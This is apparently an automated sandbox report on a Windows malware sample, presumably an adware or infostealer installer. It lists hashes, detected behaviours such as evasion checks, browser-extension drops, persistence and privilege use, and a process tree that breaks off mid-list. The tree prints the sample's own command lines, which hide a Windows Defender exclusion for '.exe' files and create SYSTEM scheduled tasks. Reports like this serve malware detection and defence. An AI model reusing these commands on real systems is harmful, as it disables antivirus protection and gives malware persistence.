Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
06-04-2024 10:00
Static task
static1
Behavioral task
behavioral1
Sample
fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc.exe
Resource
win10v2004-20240226-en
General
-
Target
fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc.exe
-
Size
6.9MB
-
MD5
e12e3747f1fc89362e1667ac5bccc439
-
SHA1
34f84d7e0082a6b1fee52d91394f3ee7bb2e1fc7
-
SHA256
fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc
-
SHA512
2f3330aef7516ca471920ee6d9d50cba1ecaad426fb2700a61c3a137b27752fb9c26f31171f1ed1ed2c73c673abe6fd387f8a1527f1d79b3f03b775f80b0089c
-
SSDEEP
196608:91OZS+/2O/p4JoHlBoyF0Cg+AqDXZPCToG97:3Ob/2O/p4J+PF0r+FXFCTo2
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 17 3532 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Control Panel\International\Geo\Nation nokwLIc.exe -
Executes dropped EXE 3 IoCs
pid Process 2376 Install.exe 4272 azRdJLP.exe 4732 nokwLIc.exe -
Loads dropped DLL 1 IoCs
pid Process 3532 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json nokwLIc.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json nokwLIc.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini nokwLIc.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 nokwLIc.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol azRdJLP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA nokwLIc.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 nokwLIc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini azRdJLP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA nokwLIc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 nokwLIc.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\wtZEsiVEU\ixocmj.dll nokwLIc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja nokwLIc.exe File created C:\Program Files (x86)\vCIAnFcQAxoU2\yiIxfoAcgmfji.dll nokwLIc.exe File created C:\Program Files (x86)\QSkHgAnxcejbKBcgPeR\oaCXpSu.dll nokwLIc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nokwLIc.exe File created C:\Program Files (x86)\vCIAnFcQAxoU2\pVSiYWg.xml nokwLIc.exe File created C:\Program Files (x86)\QeSinyHVynhjC\GFkAQxy.xml nokwLIc.exe File created C:\Program Files (x86)\PQLMSqiBAQUn\ixNfhSw.dll nokwLIc.exe File created C:\Program Files (x86)\wtZEsiVEU\jEBEUJa.xml nokwLIc.exe File created C:\Program Files (x86)\QSkHgAnxcejbKBcgPeR\szEALtR.xml nokwLIc.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi nokwLIc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi nokwLIc.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak nokwLIc.exe File created C:\Program Files (x86)\QeSinyHVynhjC\JhJTjtz.dll nokwLIc.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bBnYWwjnJGGpcSkUWT.job schtasks.exe File created C:\Windows\Tasks\ldxAgwOhkvPNhbwAM.job schtasks.exe File created C:\Windows\Tasks\rCGVCGVOEIeoNLR.job schtasks.exe File created C:\Windows\Tasks\vIlXVaftrwFhqzMdS.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4012 schtasks.exe 5028 schtasks.exe 4516 schtasks.exe 1364 schtasks.exe 1156 schtasks.exe 1180 schtasks.exe 2500 schtasks.exe 880 schtasks.exe 4472 schtasks.exe 2028 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume nokwLIc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\NukeOnDelete = "0" nokwLIc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" nokwLIc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" nokwLIc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8465b6cf-0000-0000-0000-d01200000000}\MaxCapacity = "14116" nokwLIc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing nokwLIc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket nokwLIc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" nokwLIc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2828 powershell.exe 2828 powershell.exe 4608 powershell.exe 4608 powershell.exe 1048 powershell.exe 1048 powershell.exe 2848 powershell.EXE 2848 powershell.EXE 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 1652 powershell.exe 1652 powershell.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe 4732 nokwLIc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2828 powershell.exe Token: SeIncreaseQuotaPrivilege 3664 WMIC.exe Token: SeSecurityPrivilege 3664 WMIC.exe Token: SeTakeOwnershipPrivilege 3664 WMIC.exe Token: SeLoadDriverPrivilege 3664 WMIC.exe Token: SeSystemProfilePrivilege 3664 WMIC.exe Token: SeSystemtimePrivilege 3664 WMIC.exe Token: SeProfSingleProcessPrivilege 3664 WMIC.exe Token: SeIncBasePriorityPrivilege 3664 WMIC.exe Token: SeCreatePagefilePrivilege 3664 WMIC.exe Token: SeBackupPrivilege 3664 WMIC.exe Token: SeRestorePrivilege 3664 WMIC.exe Token: SeShutdownPrivilege 3664 WMIC.exe Token: SeDebugPrivilege 3664 WMIC.exe Token: SeSystemEnvironmentPrivilege 3664 WMIC.exe Token: SeRemoteShutdownPrivilege 3664 WMIC.exe Token: SeUndockPrivilege 3664 WMIC.exe Token: SeManageVolumePrivilege 3664 WMIC.exe Token: 33 3664 WMIC.exe Token: 34 3664 WMIC.exe Token: 35 3664 WMIC.exe Token: 36 3664 WMIC.exe Token: SeIncreaseQuotaPrivilege 3664 WMIC.exe Token: SeSecurityPrivilege 3664 WMIC.exe Token: SeTakeOwnershipPrivilege 3664 WMIC.exe Token: SeLoadDriverPrivilege 3664 WMIC.exe Token: SeSystemProfilePrivilege 3664 WMIC.exe Token: SeSystemtimePrivilege 3664 WMIC.exe Token: SeProfSingleProcessPrivilege 3664 WMIC.exe Token: SeIncBasePriorityPrivilege 3664 WMIC.exe Token: SeCreatePagefilePrivilege 3664 WMIC.exe Token: SeBackupPrivilege 3664 WMIC.exe Token: SeRestorePrivilege 3664 WMIC.exe Token: SeShutdownPrivilege 3664 WMIC.exe Token: SeDebugPrivilege 3664 WMIC.exe Token: SeSystemEnvironmentPrivilege 3664 WMIC.exe Token: SeRemoteShutdownPrivilege 3664 WMIC.exe Token: SeUndockPrivilege 3664 WMIC.exe Token: SeManageVolumePrivilege 3664 WMIC.exe Token: 33 3664 WMIC.exe Token: 34 3664 WMIC.exe Token: 35 3664 WMIC.exe Token: 36 3664 WMIC.exe Token: SeDebugPrivilege 4608 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 2848 powershell.EXE Token: SeDebugPrivilege 1652 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3340 WMIC.exe Token: SeIncreaseQuotaPrivilege 3340 WMIC.exe Token: SeSecurityPrivilege 3340 WMIC.exe Token: SeTakeOwnershipPrivilege 3340 WMIC.exe Token: SeLoadDriverPrivilege 3340 WMIC.exe Token: SeSystemtimePrivilege 3340 WMIC.exe Token: SeBackupPrivilege 3340 WMIC.exe Token: SeRestorePrivilege 3340 WMIC.exe Token: SeShutdownPrivilege 3340 WMIC.exe Token: SeSystemEnvironmentPrivilege 3340 WMIC.exe Token: SeUndockPrivilege 3340 WMIC.exe Token: SeManageVolumePrivilege 3340 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3340 WMIC.exe Token: SeIncreaseQuotaPrivilege 3340 WMIC.exe Token: SeSecurityPrivilege 3340 WMIC.exe Token: SeTakeOwnershipPrivilege 3340 WMIC.exe Token: SeLoadDriverPrivilege 3340 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2332 wrote to memory of 2376 2332 fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc.exe 77 PID 2332 wrote to memory of 2376 2332 fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc.exe 77 PID 2332 wrote to memory of 2376 2332 fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc.exe 77 PID 2376 wrote to memory of 2844 2376 Install.exe 79 PID 2376 wrote to memory of 2844 2376 Install.exe 79 PID 2376 wrote to memory of 2844 2376 Install.exe 79 PID 2844 wrote to memory of 1824 2844 forfiles.exe 81 PID 2844 wrote to memory of 1824 2844 forfiles.exe 81 PID 2844 wrote to memory of 1824 2844 forfiles.exe 81 PID 1824 wrote to memory of 2828 1824 cmd.exe 82 PID 1824 wrote to memory of 2828 1824 cmd.exe 82 PID 1824 wrote to memory of 2828 1824 cmd.exe 82 PID 2828 wrote to memory of 3664 2828 powershell.exe 83 PID 2828 wrote to memory of 3664 2828 powershell.exe 83 PID 2828 wrote to memory of 3664 2828 powershell.exe 83 PID 2376 wrote to memory of 2028 2376 Install.exe 85 PID 2376 wrote to memory of 2028 2376 Install.exe 85 PID 2376 wrote to memory of 2028 2376 Install.exe 85 PID 4272 wrote to memory of 4608 4272 azRdJLP.exe 88 PID 4272 wrote to memory of 4608 4272 azRdJLP.exe 88 PID 4272 wrote to memory of 4608 4272 azRdJLP.exe 88 PID 4608 wrote to memory of 4144 4608 powershell.exe 90 PID 4608 wrote to memory of 4144 4608 powershell.exe 90 PID 4608 wrote to memory of 4144 4608 powershell.exe 90 PID 4144 wrote to memory of 3724 4144 cmd.exe 91 PID 4144 wrote to memory of 3724 4144 cmd.exe 91 PID 4144 wrote to memory of 3724 4144 cmd.exe 91 PID 4608 wrote to memory of 1416 4608 powershell.exe 92 PID 4608 wrote to memory of 1416 4608 powershell.exe 92 PID 4608 wrote to memory of 1416 4608 powershell.exe 92 PID 4608 wrote to memory of 4064 4608 powershell.exe 93 PID 4608 wrote to memory of 4064 4608 powershell.exe 93 PID 4608 wrote to memory of 4064 4608 powershell.exe 93 PID 4608 wrote to memory of 4836 4608 powershell.exe 94 PID 4608 wrote to memory of 4836 4608 powershell.exe 94 PID 4608 wrote to memory of 4836 4608 powershell.exe 94 PID 4608 wrote to memory of 916 4608 powershell.exe 95 PID 4608 wrote to memory of 916 4608 powershell.exe 95 PID 4608 wrote to memory of 916 4608 powershell.exe 95 PID 4608 wrote to memory of 4548 4608 powershell.exe 96 PID 4608 wrote to memory of 4548 4608 powershell.exe 96 PID 4608 wrote to memory of 4548 4608 powershell.exe 96 PID 4608 wrote to memory of 4648 4608 powershell.exe 97 PID 4608 wrote to memory of 4648 4608 powershell.exe 97 PID 4608 wrote to memory of 4648 4608 powershell.exe 97 PID 4608 wrote to memory of 4964 4608 powershell.exe 98 PID 4608 wrote to memory of 4964 4608 powershell.exe 98 PID 4608 wrote to memory of 4964 4608 powershell.exe 98 PID 4608 wrote to memory of 4856 4608 powershell.exe 99 PID 4608 wrote to memory of 4856 4608 powershell.exe 99 PID 4608 wrote to memory of 4856 4608 powershell.exe 99 PID 4608 wrote to memory of 3792 4608 powershell.exe 100 PID 4608 wrote to memory of 3792 4608 powershell.exe 100 PID 4608 wrote to memory of 3792 4608 powershell.exe 100 PID 4608 wrote to memory of 2076 4608 powershell.exe 101 PID 4608 wrote to memory of 2076 4608 powershell.exe 101 PID 4608 wrote to memory of 2076 4608 powershell.exe 101 PID 4608 wrote to memory of 2804 4608 powershell.exe 102 PID 4608 wrote to memory of 2804 4608 powershell.exe 102 PID 4608 wrote to memory of 2804 4608 powershell.exe 102 PID 4608 wrote to memory of 3924 4608 powershell.exe 103 PID 4608 wrote to memory of 3924 4608 powershell.exe 103 PID 4608 wrote to memory of 3924 4608 powershell.exe 103 PID 4608 wrote to memory of 1156 4608 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc.exe"C:\Users\Admin\AppData\Local\Temp\fc197cb2aefebf5cdf20da12d2b62990bcd29b601cf8fb03a5c7c0c064f214bc.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\7zS61A8.tmp\Install.exe.\Install.exe /vWVKXdidpPu "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bBnYWwjnJGGpcSkUWT" /SC once /ST 10:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BTlodwNIywtfsdomJ\GzUTldvHwwrctin\azRdJLP.exe\" r3 /PXsite_idEWZ 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2028
-
-
-
C:\Users\Admin\AppData\Local\Temp\BTlodwNIywtfsdomJ\GzUTldvHwwrctin\azRdJLP.exeC:\Users\Admin\AppData\Local\Temp\BTlodwNIywtfsdomJ\GzUTldvHwwrctin\azRdJLP.exe r3 /PXsite_idEWZ 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4272 -
